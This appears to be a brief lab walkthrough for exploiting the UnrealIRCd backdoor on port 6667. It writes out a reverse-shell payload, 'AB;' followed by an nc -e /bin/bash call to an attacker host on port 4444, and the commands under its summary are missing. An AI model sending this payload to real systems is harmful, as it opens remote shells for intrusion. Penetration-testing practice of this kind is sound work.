Unreal IRC 6667
1. Search for Exploits
First, check for known exploits in Exploit-DB. A relevant exploit for Unreal IRC is listed as Exploit-DB #13853. This exploit can be used to create a reverse shell by abusing the service running on port 6667.
2. Connect to Target's Unreal IRC with Netcat
3. Set up a Listener on Your Kali Machine
4. Execute the Payload to Create Reverse Shell
AB;
sends a payload that the server executes (it could be part of the Unreal IRC vulnerability).nc -e /bin/bash 11.11.11.11 4444
tells the target system to executenc
and open a reverse shell (/bin/bash
) to your Kali machine on port 4444.
5. Establish and Stabilize the Reverse Shell
This creates a more stable pseudo-terminal, allowing for better interaction with the shell.
Summary of Commands:
On Kali Machine (attacker):
Start listener on port 4444:
On Target (10.10.10.10):
Connect to Unreal IRC service:
Fire off reverse shell command:
Once connected, stabilize the shell:
Last updated